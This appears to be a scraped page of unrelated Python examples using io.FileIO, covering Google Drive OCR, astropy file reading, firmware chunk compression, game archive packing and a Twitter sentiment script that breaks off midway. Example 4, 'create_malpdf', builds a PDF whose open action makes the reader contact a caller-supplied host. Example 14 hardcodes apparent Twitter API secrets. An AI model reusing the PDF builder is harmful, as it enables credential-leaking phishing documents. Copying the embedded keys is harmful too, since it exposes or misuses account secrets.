Ejemplo n.º 1
0
def getOCR():

    if request.method == 'GET':
        # get ImageUrl and langcode from Form
        imageUrl = request.args.get('imageurl', '')

        # Hey why get langcode?, It is not using anyywhere
        # Well, It will use in future. This is important variable
        langcode = request.args.get('langcode', '')

        # Get api parameter value
        isAPI = request.args.get('api', '')

        # Create a unique file name based on time
        currentTime = str(datetime.datetime.now())
        getfileName = currentTime.replace(':', '_')
        getfileName = getfileName.replace(' ', '_')

        # Download the Image File
        r = requests.get(imageUrl, allow_redirects=True)
        fileName = getfileName + "." + r.headers.get('content-type').replace(
            'image/', '')
        open("ocr/" + fileName, 'wb').write(r.content)

        # Google Drive API Setup
        SCOPES = 'https://www.googleapis.com/auth/drive.file'
        store = file.Storage('token.json')
        creds = store.get()
        if not creds or creds.invalid:
            flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)
            creds = tools.run_flow(flow, store)
        service = build('drive', 'v3', http=creds.authorize(Http()))

        # Upload the file on Goggle Drive
        folder_id = '1bUOQUn-ZYTpUYcMxD8myU9nKj2Vywtqo'
        mime = 'application/vnd.google-apps.document'
        file_metadata = {
            'name': fileName,
            'mimeType': mime,
            'parents': [folder_id]
        }
        media = MediaFileUpload("ocr/" + fileName, mimetype=mime)
        Imgfile = service.files().create(body=file_metadata,
                                         media_body=media,
                                         fields='id').execute()

        # Delete Img file locally.
        os.remove("ocr/" + fileName)

        # Download the file in txt format from Google Drive
        getTxt = service.files().export_media(fileId=Imgfile.get('id'),
                                              mimeType='text/plain')
        fh = io.FileIO("ocr/" + getfileName + ".txt", 'wb')
        downloader = MediaIoBaseDownload(fh, getTxt)
        downloader.next_chunk()

        # Read the file
        OCRtext = io.open("ocr/" + getfileName + ".txt",
                          mode="r",
                          encoding="utf-8").read()

        # Check if it is api request
        if "True" in isAPI:
            return jsonify({"text": OCRtext})

        # Return the html page with OCR data
        return render_template('getOCR.html',
                               imageUrl=imageUrl,
                               OCRtext=OCRtext)
Ejemplo n.º 2
0
def writeToFile(fileData):
    with io.FileIO('./test.jpg', 'w') as file:
        file.write(fileData)
Ejemplo n.º 3
0
def get_readable_fileobj(name_or_obj, encoding=None, cache=False,
                         show_progress=True, remote_timeout=None):
    """
    Given a filename, pathlib.Path object or a readable file-like object, return a context
    manager that yields a readable file-like object.

    This supports passing filenames, URLs, and readable file-like objects,
    any of which can be compressed in gzip, bzip2 or lzma (xz) if the
    appropriate compression libraries are provided by the Python installation.

    Notes
    -----

    This function is a context manager, and should be used for example
    as::

        with get_readable_fileobj('file.dat') as f:
            contents = f.read()

    Parameters
    ----------
    name_or_obj : str or file-like object
        The filename of the file to access (if given as a string), or
        the file-like object to access.

        If a file-like object, it must be opened in binary mode.

    encoding : str, optional
        When `None` (default), returns a file-like object with a
        ``read`` method that returns `str` (``unicode``) objects, using
        `locale.getpreferredencoding` as an encoding.  This matches
        the default behavior of the built-in `open` when no ``mode``
        argument is provided.

        When ``'binary'``, returns a file-like object where its ``read``
        method returns `bytes` objects.

        When another string, it is the name of an encoding, and the
        file-like object's ``read`` method will return `str` (``unicode``)
        objects, decoded from binary using the given encoding.

    cache : bool, optional
        Whether to cache the contents of remote URLs.

    show_progress : bool, optional
        Whether to display a progress bar if the file is downloaded
        from a remote server.  Default is `True`.

    remote_timeout : float
        Timeout for remote requests in seconds (default is the configurable
        `astropy.utils.data.Conf.remote_timeout`, which is 3s by default)

    Returns
    -------
    file : readable file-like object
    """

    # close_fds is a list of file handles created by this function
    # that need to be closed.  We don't want to always just close the
    # returned file handle, because it may simply be the file handle
    # passed in.  In that case it is not the responsibility of this
    # function to close it: doing so could result in a "double close"
    # and an "invalid file descriptor" exception.
    PATH_TYPES = (str, pathlib.Path)

    close_fds = []
    delete_fds = []

    if remote_timeout is None:
        # use configfile default
        remote_timeout = conf.remote_timeout

    # Get a file object to the content
    if isinstance(name_or_obj, PATH_TYPES):
        # name_or_obj could be a Path object if pathlib is available
        name_or_obj = str(name_or_obj)

        is_url = _is_url(name_or_obj)
        if is_url:
            name_or_obj = download_file(
                name_or_obj, cache=cache, show_progress=show_progress,
                timeout=remote_timeout)
        fileobj = io.FileIO(name_or_obj, 'r')
        if is_url and not cache:
            delete_fds.append(fileobj)
        close_fds.append(fileobj)
    else:
        fileobj = name_or_obj

    # Check if the file object supports random access, and if not,
    # then wrap it in a BytesIO buffer.  It would be nicer to use a
    # BufferedReader to avoid reading loading the whole file first,
    # but that is not compatible with streams or urllib2.urlopen
    # objects on Python 2.x.
    if not hasattr(fileobj, 'seek'):
        fileobj = io.BytesIO(fileobj.read())

    # Now read enough bytes to look at signature
    signature = fileobj.read(4)
    fileobj.seek(0)

    if signature[:3] == b'\x1f\x8b\x08':  # gzip
        import struct
        try:
            import gzip
            fileobj_new = gzip.GzipFile(fileobj=fileobj, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really gzip
        except (OSError, EOFError, struct.error):  # invalid gzip file
            fileobj.seek(0)
            fileobj_new.close()
        else:
            fileobj_new.seek(0)
            fileobj = fileobj_new
    elif signature[:3] == b'BZh':  # bzip2
        try:
            import bz2
        except ImportError:
            for fd in close_fds:
                fd.close()
            raise ValueError(
                ".bz2 format files are not supported since the Python "
                "interpreter does not include the bz2 module")
        try:
            # bz2.BZ2File does not support file objects, only filenames, so we
            # need to write the data to a temporary file
            with NamedTemporaryFile("wb", delete=False) as tmp:
                tmp.write(fileobj.read())
                tmp.close()
                fileobj_new = bz2.BZ2File(tmp.name, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really bzip2
        except OSError:  # invalid bzip2 file
            fileobj.seek(0)
            fileobj_new.close()
            # raise
        else:
            fileobj_new.seek(0)
            close_fds.append(fileobj_new)
            fileobj = fileobj_new
    elif signature[:3] == b'\xfd7z':  # xz
        try:
            import lzma
            fileobj_new = lzma.LZMAFile(fileobj, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really xz
        except ImportError:
            for fd in close_fds:
                fd.close()
            raise ValueError(
                ".xz format files are not supported since the Python "
                "interpreter does not include the lzma module.")
        except (OSError, EOFError) as e:  # invalid xz file
            fileobj.seek(0)
            fileobj_new.close()
            # should we propagate this to the caller to signal bad content?
            # raise ValueError(e)
        else:
            fileobj_new.seek(0)
            fileobj = fileobj_new

    # By this point, we have a file, io.FileIO, gzip.GzipFile, bz2.BZ2File
    # or lzma.LZMAFile instance opened in binary mode (that is, read
    # returns bytes).  Now we need to, if requested, wrap it in a
    # io.TextIOWrapper so read will return unicode based on the
    # encoding parameter.

    needs_textio_wrapper = encoding != 'binary'

    if needs_textio_wrapper:
        # A bz2.BZ2File can not be wrapped by a TextIOWrapper,
        # so we decompress it to a temporary file and then
        # return a handle to that.
        try:
            import bz2
        except ImportError:
            pass
        else:
            if isinstance(fileobj, bz2.BZ2File):
                tmp = NamedTemporaryFile("wb", delete=False)
                data = fileobj.read()
                tmp.write(data)
                tmp.close()
                delete_fds.append(tmp)

                fileobj = io.FileIO(tmp.name, 'r')
                close_fds.append(fileobj)

        fileobj = io.BufferedReader(fileobj)
        fileobj = io.TextIOWrapper(fileobj, encoding=encoding)

        # Ensure that file is at the start - io.FileIO will for
        # example not always be at the start:
        # >>> import io
        # >>> f = open('test.fits', 'rb')
        # >>> f.read(4)
        # 'SIMP'
        # >>> f.seek(0)
        # >>> fileobj = io.FileIO(f.fileno())
        # >>> fileobj.tell()
        # 4096L

        fileobj.seek(0)

    try:
        yield fileobj
    finally:
        for fd in close_fds:
            fd.close()
        for fd in delete_fds:
            os.remove(fd.name)
Ejemplo n.º 4
0
def create_malpdf(filename, host):
    print("[*] Starting Process.. [*]")
    with io.FileIO(filename, "w") as file:
        file.write('''
%PDF-1.7

1 0 obj
<</Type/Catalog/Pages 2 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>
endobj
xref
0 4
0000000000 65535 f
0000000015 00000 n
0000000060 00000 n
0000000111 00000 n
trailer
<</Size 4/Root 1 0 R>>
startxref
190
3 0 obj
<< /Type /Page
   /Contents 4 0 R

   /AA <<
	   /O <<
	      /F (''' + host + '''test)
		  /D [ 0 /Fit]
		  /S /GoToE
		  >>

	   >>

	   /Parent 2 0 R
	   /Resources <<
			/Font <<
				/F1 <<
					/Type /Font
					/Subtype /Type1
					/BaseFont /Helvetica
					>>
				  >>
				>>
>>
endobj


4 0 obj<< /Length 100>>
stream
BT
/TI_0 1 Tf
14 0 0 14 10.000 753.976 Tm
0.0 0.0 0.0 rg
(PDF Document) Tj
ET
endstream
endobj


trailer
<<
	/Root 1 0 R
>>

%%EOF
''')
Ejemplo n.º 5
0
    def download(self,
                 fileID,
                 path,
                 skipHash=False
                 ):  #Downloads a file. If a folder, pass to downloadFolder()
        #if '-nohash' in args:
        #    skipHash = True

        if path[-1] != '/':
            path += '/'
        if not os.path.exists(path):
            os.makedirs(path)

        metaData = self.service.files().get(fileId=fileID,
                                            fields='name, mimeType, size',
                                            supportsAllDrives=True).execute()
        mimetype = metaData['mimeType']
        name = metaData['name']

        if 'google-apps' in mimetype:
            if mimetype == 'application/vnd.google-apps.folder':  #If file is folder
                self.downloadFolder(fileID, path, skipHash=skipHash)
                return True
            else:  #Skip Google files, as they require their own download process
                print(
                    'ERROR: Unable to download Google files (docs, sheets, etc)'
                )
                return False

        size = metaData['size']

        print('Downloading file \"{}\"'.format(name))

        if size == '0':
            with open(path + name, 'w') as f:
                pass
        else:
            request = self.service.files().get_media(fileId=fileID)
            fh = io.FileIO(path + name, 'wb')
            self.downloader = MediaIoBaseDownload(fh, request)
            self.done = False

            errorCounter = 1
            maxErrors = 5
            done = False
            while done is False:
                while True:
                    try:
                        status, done = self.downloader.next_chunk()
                        break
                    except HttpError as e:  #Wait 2 seconds then retry download request. Need to implement exponential backoff decorator
                        status_code = e.resp['status']
                        print('HttpError {}: Retrying request ({}/{}).'.format(
                            status_code, errorCounter, maxErrors))
                        errorCounter += 1
                        sleep(2)
                        if errorCounter > maxErrors:
                            print('Skipping file \"{}\"...\n'.format(name))
                            done = True
                            return False

            if not skipHash:
                print('checking hash...')
                if self.getMd5(fileID) != self.calculateMd5(path + name):
                    print('ERROR: Checksums do not match')
        print('File \"{}\" downloaded\n'.format(path + name))
    'Prunes any samples shorter than the min duration (given in seconds, default 1)'
)
parser.add_argument(
    '--max_duration',
    default=15,
    type=int,
    help=
    'Prunes any samples longer than the max duration (given in seconds, default 15)'
)
parser.add_argument('--output_path',
                    default='merged_manifest.csv',
                    help='Output path to merged manifest')

args = parser.parse_args()

file_paths = []
for file in os.listdir(args.merge_dir):
    if file.endswith(".csv"):
        with open(os.path.join(args.merge_dir, file), 'r') as fh:
            file_paths += fh.readlines()
file_paths = [file_path.split(',')[0] for file_path in file_paths]
file_paths = order_and_prune_files(file_paths, args.min_duration,
                                   args.max_duration)
with io.FileIO(args.output_path, "w") as file:
    for wav_path in tqdm(file_paths, total=len(file_paths)):
        transcript_path = wav_path.replace('/wav/',
                                           '/txt/').replace('.wav', '.txt')
        sample = os.path.abspath(wav_path) + ',' + os.path.abspath(
            transcript_path) + '\n'
        file.write(sample.encode('utf-8'))
Ejemplo n.º 7
0
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(
    client_secrets_file, scopes)
credentials = flow.run_console()
youtube = googleapiclient.discovery.build(api_service_name,
                                          api_version,
                                          credentials=credentials)
# Grab caption ID from video
request = youtube.captions().list(videoId=youtubevideo, part="snippet")
captionid = ''
response = request.execute()
for i in response['items']:
    if i['snippet']['language'] == 'en':
        captionid = i['id']
# Download caption file.
request = youtube.captions().download(id=captionid)
fh = io.FileIO('captions_EN.svb', 'wb')
download = MediaIoBaseDownload(fh, request)
complete = False
while not complete:
    status, complete = download.next_chunk()
# Read caption file
with open('captions_EN.svb', "r", encoding='utf-8') as myfile:
    input = myfile.readlines()


# Translate fucntion
def translate(langout):
    deepl_url = 'https://api.deepl.com/v2/translate?'
    data = {
        'auth_key': deeplkey,
        'text': input,
Ejemplo n.º 8
0
    def makeChunksEXT4FS(self, name):
        """
		Generate one or more .chunks files assuming an EXT4 FS
		"""

        os.chdir(os.path.dirname(name))
        name = os.path.basename(name)
        baseName = name.rpartition(".")[0] + "_"
        sliceName = name.rpartition(".")[0].encode("utf8")

        # Check length before closing
        eof = self.file.seek(0, io.SEEK_END)

        # Alas, ext2simg can't take the image as stdin
        self.file.close()

        sparse = EXT4SparseFile(name, 1 << self.blockShift)

        # sigh, Python 2 hack for some variables
        class nl:
            yuck = "truly"

        nl.current = 0
        nl.targetAddr = self.startLBA
        nl.trimCount = 0

        # local function not used by anyone else
        def complete():
            #			nonlocal zlen, md5, current, targetAddr, trimCount
            zdata = zobj.flush(zlib.Z_FINISH)
            nl.zlen += len(zdata)
            out.write(zdata)
            nl.md5 = nl.md5.digest()

            out.seek(0, io.SEEK_SET)

            values = {
                'sliceName': sliceName,
                'chunkName': chunkName,
                'targetSize': dataBlocks << self.blockShift,
                'dataSize': nl.zlen,
                'md5': nl.md5,
                'targetAddr': nl.targetAddr,
                'trimCount': nl.trimCount,
                'crc32': crc & 0xFFFFFFFF,
                'dev': self.dev,
            }

            nl.header = self.packdict(values)
            out.write(nl.header)
            out.close()

            nl.current += nl.trimCount << self.blockShift
            nl.targetAddr = self.startLBA + (nl.current >> self.blockShift)

            print("({:d} empty blocks)".format(nl.trimCount - dataBlocks))

            nl.trimCount = 0

        for chunk in sparse:
            if chunk.type == EXT4SparseChunk.typeRaw or chunk.type == EXT4SparseChunk.typeFill:
                if nl.trimCount:
                    complete()
                dataBlocks = chunk.remaining >> self.blockShift
                nl.trimCount += dataBlocks

                nl.md5 = hashlib.md5()
                crc = crc32(b"")
                zobj = zlib.compressobj(1)

                chunkName = baseName + str(nl.targetAddr) + ".bin"
                out = io.FileIO(chunkName + ".chunk", "wb")

                sys.stdout.write("[+] Compressing {:s} to {:s} ".format(
                    name, chunkName))

                chunkName = chunkName.encode("utf8")
                out.seek(self._dz_length, io.SEEK_SET)
                nl.zlen = 0

                for buf in chunk:
                    nl.md5.update(buf)
                    crc = crc32(buf, crc)
                    zdata = zobj.compress(buf)
                    nl.zlen += len(zdata)
                    out.write(zdata)

            elif chunk.type == EXT4SparseChunk.typeDontCare:
                # check for EOF, lastWipe overrides
                if sparse.chunkCount == 0:
                    nl.trimCount = self.lastWipe - nl.targetAddr
                else:
                    nl.trimCount += chunk.remaining >> self.blockShift
                complete()

            elif chunk.type == EXT4SparseChunk.typeCrc32:
                pass
            else:
                print("[!] Error: unknown chunk, type=0x{:04X}".format(
                    chunk.type),
                      file=sys.stderr)
                sys.exit(64)

        if nl.trimCount:
            nl.trimCount = self.lastWipe - nl.targetAddr
            complete()

        print("[+] done\n")
Ejemplo n.º 9
0
    def makeChunksProbe(self, name):
        """
		Generate one or more .chunks files for the named file
		"""

        os.chdir(os.path.dirname(name))
        name = os.path.basename(name)
        baseName = name.rpartition(".")[0] + "_"
        sliceName = name.rpartition(".")[0].encode("utf8")

        current = 0
        targetAddr = self.startLBA
        eof = self.file.seek(0, io.SEEK_END)
        self.file.seek(0, io.SEEK_SET)

        # emulate characteristics of LG's tool, always find a block at start
        readSize = self.blockSize << 10

        md5 = hashlib.md5()
        crc = crc32(b"")
        zobj = zlib.compressobj(1)
        self.file.seek(current, io.SEEK_SET)

        chunkName = baseName + str(targetAddr) + ".bin"
        out = io.FileIO(chunkName + ".chunk", "wb")

        sys.stdout.write("[+] Compressing {:s} to {:s} ".format(
            name, chunkName))

        chunkName = chunkName.encode("utf8")
        out.seek(self._dz_length, io.SEEK_SET)
        zlen = 0

        wipeData = readSize
        dataCount = readSize

        buf = self.file.read(readSize)

        while len(buf.lstrip(b'\x00')) == 0 and current < eof:
            md5.update(buf)
            crc = crc32(buf, crc)
            zdata = zobj.compress(buf)
            zlen += len(zdata)
            out.write(zdata)
            wipeData += readSize
            dataCount += readSize
            current += readSize

            buf = self.file.read(readSize)

        while current < eof:

            while len(buf.lstrip(b'\x00')) != 0 and current < eof:
                md5.update(buf)
                crc = crc32(buf, crc)
                zdata = zobj.compress(buf)
                zlen += len(zdata)
                out.write(zdata)
                wipeData += readSize
                dataCount += readSize
                current += readSize

                buf = self.file.read(readSize)

            zdata = zobj.flush(zlib.Z_FINISH)
            zlen += len(zdata)
            out.write(zdata)
            md5 = md5.digest()

            while len(buf.lstrip(b'\x00')) == 0 and current < eof:
                wipeData += readSize
                current += readSize
                buf = self.file.read(readSize)

            print("({:d} empty blocks)".format((wipeData -
                                                dataCount) >> self.blockShift))

            out.seek(0, io.SEEK_SET)

            values = {
                'sliceName': sliceName,
                'chunkName': chunkName,
                'targetSize': dataCount,
                'dataSize': zlen,
                'md5': md5,
                'targetAddr': targetAddr,
                'trimCount': wipeData >> self.blockShift,
                'crc32': crc & 0xFFFFFFFF,
                'dev': self.dev,
            }

            header = self.packdict(values)
            out.write(header)
            out.close()

            targetAddr = self.startLBA + (current >> self.blockShift)

            if current < eof:

                md5 = hashlib.md5()
                crc = crc32(b"")
                zobj = zlib.compressobj(1)

                chunkName = baseName + str(targetAddr) + ".bin"
                out = io.FileIO(chunkName + ".chunk", "wb")

                sys.stdout.write("[+] Compressing {:s} to {:s} ".format(
                    name, chunkName))

                chunkName = chunkName.encode("utf8")
                out.seek(self._dz_length, io.SEEK_SET)
                zlen = 0

                wipeData = readSize
                dataCount = readSize

        print("[+] done\n")
    def pack_lin(self, dir):

        # Collect our files.
        file_list = sorted(list_all_files(dir))

        txt = [
            filename for filename in file_list
            if os.path.splitext(filename)[1].lower() == ".txt"
        ]
        wrd = [
            filename for filename in file_list
            if os.path.splitext(filename)[1].lower() == ".wrd"
        ]
        py = [
            filename for filename in file_list
            if os.path.splitext(filename)[1].lower() == ".py"
        ]

        # If there are more than one for whatever reason, just take the first.
        # We only have use for a single wrd or python file.
        wrd = wrd[0] if wrd else None
        py = py[0] if py else None

        # Prepare our temporary output directory.
        temp_dir = tempfile.mkdtemp(prefix="sdse-")

        # Where we're outputting our wrd file, regardless of whether it's a python
        # file or a raw binary data file.
        wrd_dst = os.path.join(temp_dir, "0.scp.wrd")

        if py:
            # _LOGGER.info("Compiling %s to binary." % py)
            try:
                wrd_file = WrdFile(py)
            except:
                _LOGGER.warning(
                    "%s failed to compile. Parsing wrd file instead. Exception info:\n%s"
                    % (py, traceback.format_exc()))
                shutil.copy(wrd, wrd_dst)
            else:
                # If we succeeded in loading the python file, compile it to binary.
                # wrd_file.save_bin(wrd)
                wrd_file.save_bin(wrd_dst)

        else:
            shutil.copy(wrd, wrd_dst)

        # Pack the text files in-place to save us a bunch of copying
        # and then move it to the tmp directory with the wrd file.
        if txt:
            with io.FileIO(os.path.join(temp_dir, "1.dat"), "w") as h:
                self.pack_dir(dir, h, file_list=txt)

        # Then pack it like normal.
        data = io.BytesIO()
        with io.BufferedWriter(data) as h:
            self.pack_dir(temp_dir, h)
            h.flush()
            data = data.getvalue()

        shutil.rmtree(temp_dir)

        return data
Ejemplo n.º 11
0
    def makeChunksHoles(self, name):
        """
		Generate one or more .chunks files for the named file
		"""

        os.chdir(os.path.dirname(name))
        name = os.path.basename(name)
        baseName = name.rpartition(".")[0] + "_"
        sliceName = name.rpartition(".")[0].encode("utf8")

        current = 0
        targetAddr = self.startLBA
        eof = self.file.seek(0, io.SEEK_END)
        self.file.seek(0, io.SEEK_SET)

        while current < eof:
            hole = (self.file.seek(current, SEEK_HOLE) + self.blockSize -
                    1) & ~(self.blockSize - 1)
            # Python's handling of this condition is suboptimal
            try:
                next = self.file.seek(hole, SEEK_DATA) & ~(self.blockSize - 1)
                trimCount = (next - current) >> self.blockShift
            except IOError:
                next = eof
                trimCount = self.lastWipe - targetAddr

            # Watch out for chunks >4GB (too big!)
            # Also, try not to test the limits of LG's tools...
            if (hole - current) >= 1 << 27:
                hole = current + (1 << 27)
                next = hole
                trimCount = (next - current) >> self.blockShift

            md5 = hashlib.md5()
            crc = crc32(b"")
            zobj = zlib.compressobj(1)
            self.file.seek(current, io.SEEK_SET)

            chunkName = baseName + str(targetAddr) + ".bin"
            out = io.FileIO(chunkName + ".chunk", "wb")

            print("[+] Compressing {:s} to {:s} ({:d} empty blocks)".format(
                name, chunkName, (next - hole) >> self.blockShift))

            chunkName = chunkName.encode("utf8")
            out.seek(self._dz_length, io.SEEK_SET)
            zlen = 0

            for b in range((hole - current) >> self.blockShift):
                buf = self.file.read(self.blockSize)
                md5.update(buf)
                crc = crc32(buf, crc)
                zdata = zobj.compress(buf)
                zlen += len(zdata)
                out.write(zdata)

            zdata = zobj.flush(zlib.Z_FINISH)
            zlen += len(zdata)
            out.write(zdata)
            md5 = md5.digest()

            out.seek(0, io.SEEK_SET)

            values = {
                'sliceName': sliceName,
                'chunkName': chunkName,
                'targetSize': hole - current,
                'dataSize': zlen,
                'md5': md5,
                'targetAddr': targetAddr,
                'trimCount': trimCount,
                'crc32': crc & 0xFFFFFFFF,
                'dev': self.dev,
            }

            header = self.packdict(values)
            out.write(header)
            out.close()

            current = next
            targetAddr = self.startLBA + (current >> self.blockShift)

        print("[+] done\n")
    def create_archives(self):

        try:
            self.width = self.parent.width()
            self.height = self.parent.height()
            self.x = self.parent.x()
            self.y = self.parent.y()
        except:
            self.width = 1920
            self.height = 1080
            self.x = 0
            self.y = 0

        self.file_count = 0

        self.progress = QProgressDialog("Reading...", QtCore.QString(), 0,
                                        72000, self.parent)
        self.progress.setWindowModality(Qt.Qt.WindowModal)
        self.progress.setValue(0)
        self.progress.setAutoClose(False)
        self.progress.setMinimumDuration(0)

        # with open(common.editor_config.eboot_orig, "rb") as f:
        with open(
                os.path.join(common.editor_config.iso_dir, "PSP_GAME",
                             "SYSDIR", "EBOOT.BIN"), "rb") as f:
            eboot = BitStream(bytes=f.read())

        eboot, eboot_offset = eboot_patch.apply_eboot_patches(eboot)

        USRDIR = os.path.join(common.editor_config.iso_dir, "PSP_GAME",
                              "USRDIR")

        # So we can loop. :)
        ARCHIVE_INFO = [
            {
                "toc": UMDIMAGES.umdimage,
                "dir": common.editor_config.umdimage_dir,
                "dat": os.path.join(USRDIR, "umdimage.dat"),
                "name": "umdimage.dat",
                "pack": common.editor_config.pack_umdimage,
                "eof": False,
            },
            {
                "toc": UMDIMAGES.umdimage2,
                "dir": common.editor_config.umdimage2_dir,
                "dat": os.path.join(USRDIR, "umdimage2.dat"),
                "name": "umdimage2.dat",
                "pack": common.editor_config.pack_umdimage2,
                "eof": False,
            },
            {
                "toc": None,
                "dir": common.editor_config.voice_dir,
                "dat": os.path.join(USRDIR, "voice.pak"),
                "name": "voice.pak",
                "pack": common.editor_config.pack_voice,
                "eof": True,
            },
            {
                "toc": None,
                "dir": common.editor_config.bgm_dir,
                "dat": os.path.join(USRDIR, "bgm.pak"),
                "name": "bgm.pak",
                "pack": common.editor_config.pack_bgm,
                "eof": True,
            },
        ]

        for archive in ARCHIVE_INFO:

            if not archive["pack"]:
                continue

            self.progress.setWindowTitle("Building " + archive["name"])

            toc_info = {}
            file_list = None

            if archive["toc"]:
                file_list = []

                toc = get_toc(eboot, archive["toc"])

                for entry in toc:
                    filename = entry["filename"]
                    pos_pos = entry["file_pos_pos"]
                    len_pos = entry["file_len_pos"]

                    toc_info[filename] = [pos_pos, len_pos]
                    file_list.append(filename)

            # Causes memory issues if I use the original order, for whatever reason.
            file_list = None

            with io.FileIO(archive["dat"], "w") as handler:
                table_of_contents = self.pack_dir(archive["dir"],
                                                  handler,
                                                  file_list=file_list,
                                                  eof=archive["eof"])

            # We're playing fast and loose with the file count anyway, so why not?
            self.file_count += 1
            self.progress.setValue(self.file_count)
            self.progress.setLabelText("Saving " + archive["name"] + "...")

            if archive["toc"]:
                for entry in table_of_contents:
                    if not entry in toc_info:
                        _LOGGER.warning(
                            "%s missing from %s table of contents." %
                            (entry, archive["name"]))
                        continue

                    file_pos = table_of_contents[entry]["pos"]
                    file_size = table_of_contents[entry]["size"]

                    eboot.overwrite(BitStream(uintle=file_pos, length=32),
                                    toc_info[entry][0] * 8)
                    eboot.overwrite(BitStream(uintle=file_size, length=32),
                                    toc_info[entry][1] * 8)

            del table_of_contents

        self.progress.setLabelText("Saving EBOOT.BIN...")
        self.progress.setValue(self.progress.maximum())

        # Text replacement
        to_replace = eboot_text.get_eboot_text()
        for replacement in to_replace:

            orig = bytearray(replacement.orig, encoding=replacement.enc)

            # If they left something blank, write the original text back.
            if len(replacement.text) == 0:
                data = orig
            else:
                data = bytearray(replacement.text, encoding=replacement.enc)

            pos = replacement.pos.int + eboot_offset

            padding = len(orig) - len(data)
            if padding > 0:
                # Null bytes to fill the rest of the space the original took.
                data.extend(bytearray(padding))

            data = ConstBitStream(bytes=data)
            eboot.overwrite(data, pos * 8)

        eboot_out = os.path.join(common.editor_config.iso_dir, "PSP_GAME",
                                 "SYSDIR", "EBOOT.BIN")

        with open(eboot_out, "wb") as f:
            eboot.tofile(f)

        self.progress.close()
Ejemplo n.º 13
0
def save_file_in_path(file_path, file_content, file_name):
    with io.FileIO(file_path, "wb") as fn:
        fn.write(file_content)
    return True
Ejemplo n.º 14
0
def main_func(user_screen_name, tweets_count):
    from apiclient import discovery
    from httplib2 import Http
    import oauth2client
    from oauth2client import file, client, tools
    import io
    from googleapiclient.http import MediaIoBaseDownload
    import tweepy
    import csv
    import pandas as pd
    from bs4 import BeautifulSoup
    from nltk.tokenize import WordPunctTokenizer
    from nltk.stem.wordnet import WordNetLemmatizer
    from nltk.stem.lancaster import LancasterStemmer
    from gensim.models import Word2Vec
    import multiprocessing
    from nltk.corpus import stopwords
    import re
    import pickle
    import numpy as np
    from sklearn.model_selection import train_test_split
    import pandas as pd
    import tensorflow as tf
    from tensorflow.contrib.tensorboard.plugins import projector
    import numpy as np
    import gensim
    import os
    import warnings
    import nltk
    warnings.filterwarnings(action='ignore',
                            category=UserWarning,
                            module='gensim')
    pd.options.mode.chained_assignment = None
    pd.set_option('display.max_columns', 7)
    nltk.download('stopwords')
    nltk.download('wordnet')

    obj = lambda: None
    lmao = {
        "auth_host_name": 'localhost',
        'noauth_local_webserver': 'store_true',
        'auth_host_port': [8080, 8090],
        'logging_level': 'ERROR'
    }
    for k, v in lmao.items():
        setattr(obj, k, v)

    SCOPES = 'https://www.googleapis.com/auth/drive.readonly'
    store = file.Storage('token.json')
    creds = store.get()

    if not creds or creds.invalid:
        flow = client.flow_from_clientsecrets('client_id.json', SCOPES)
        creds = tools.run_flow(flow, store, obj)

    DRIVE = discovery.build('drive', 'v3', http=creds.authorize(Http()))

    file_id = '1gN9u4zFWfwR5n-LmBwrcwmNGIUKj4Y0F'
    request = DRIVE.files().get_media(fileId=file_id)

    fh = io.FileIO('lemmatization_nolim_all.sav', mode='w')
    downloader = MediaIoBaseDownload(fh, request)
    done = False
    while done is False:
        status, done = downloader.next_chunk()
        print("Download %d%%." % int(status.progress() * 100))

    predict_model = 'lemmatization_nolim_all.sav'
    # parent_patch = os.getcwd()
    path = "test"
    stopWords = set(stopwords.words('english'))

    consumer_key = 'NgbszsMy18esxzBRpnS6YJSg5'
    consumer_secret = 'fUlGwElm7B7Q5UUl99TdnMewBA3xW9Cw5xmzBAq1xU9j5O6wUa'
    access_key = '3847979172-1TNy6qbn1DvF2lHuUMpM86hAyRSxN8Uc9WpZzET'  # access_token
    access_secret = 'ZCooGbFqAqxCyFtZGqMPczAhD6IkZW1TfT1hocKVPm8pV'

    tok = WordPunctTokenizer()

    pat1 = r'@[A-Za-z0-9_]+'
    pat2 = r'https?://[^ ]+'
    combined_pat = r'|'.join((pat1, pat2))
    www_pat = r'www.[^ ]+'
    negations_dic = {
        "isn't": "is not",
        "aren't": "are not",
        "wasn't": "was not",
        "weren't": "were not",
        "haven't": "have not",
        "hasn't": "has not",
        "hadn't": "had not",
        "won't": "will not",
        "wouldn't": "would not",
        "don't": "do not",
        "doesn't": "does not",
        "didn't": "did not",
        "can't": "can not",
        "couldn't": "could not",
        "shouldn't": "should not",
        "mightn't": "might not",
        "mustn't": "must not"
    }
    neg_pattern = re.compile(r'\b(' + '|'.join(negations_dic.keys()) + r')\b')

    def tweet_cleaner_updated(text, tweet_len=100):
        soup = BeautifulSoup(text, 'lxml')
        souped = soup.get_text()
        try:
            bom_removed = souped.decode("utf-8-sig").replace(u"\ufffd", "?")
        except:
            bom_removed = souped
        stripped = re.sub(combined_pat, '', bom_removed)
        stripped = re.sub(www_pat, '', stripped)
        lower_case = stripped.lower()
        neg_handled = neg_pattern.sub(lambda x: negations_dic[x.group()],
                                      lower_case)
        letters_only = re.sub("[^a-zA-Z]", " ", neg_handled)

        lema = WordNetLemmatizer()
        # lancaster_stemmer = LancasterStemmer()
        words = list()
        for word in tok.tokenize(letters_only):
            if len(word) > 1 and word not in stopWords:
                # print('raw', word)
                lema_word = lema.lemmatize(word)
                # lema_word = lancaster_stemmer.stem(word)
                if len(lema_word) == 1:
                    lema_word = word
                # print('lem', lema_word)
                words.append(lema_word)
        if len(words) <= tweet_len:
            return words, (" ".join(words)).strip()

    def get_api_clean_tweets_df(screen_name, tweet_num=5, predict_model=''):
        auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
        auth.set_access_token(access_key, access_secret)
        api = tweepy.API(auth)

        columns = ['Screen_Name', 'Time_Stamp', 'raw_tweet', 'text', 'tokens']
        tweet_df = pd.DataFrame(columns=columns)
        tweet_tokeenized = list()
        tweet_tokens = list()
        positive_tokens = list()
        tokens_positiveti_dict = dict()

        index = 0
        for status in tweepy.Cursor(api.user_timeline,
                                    screen_name=screen_name,
                                    tweet_mode="extended").items():
            clean_tweet = tweet_cleaner_updated(status.full_text)
            tweet_tokens += clean_tweet[0]
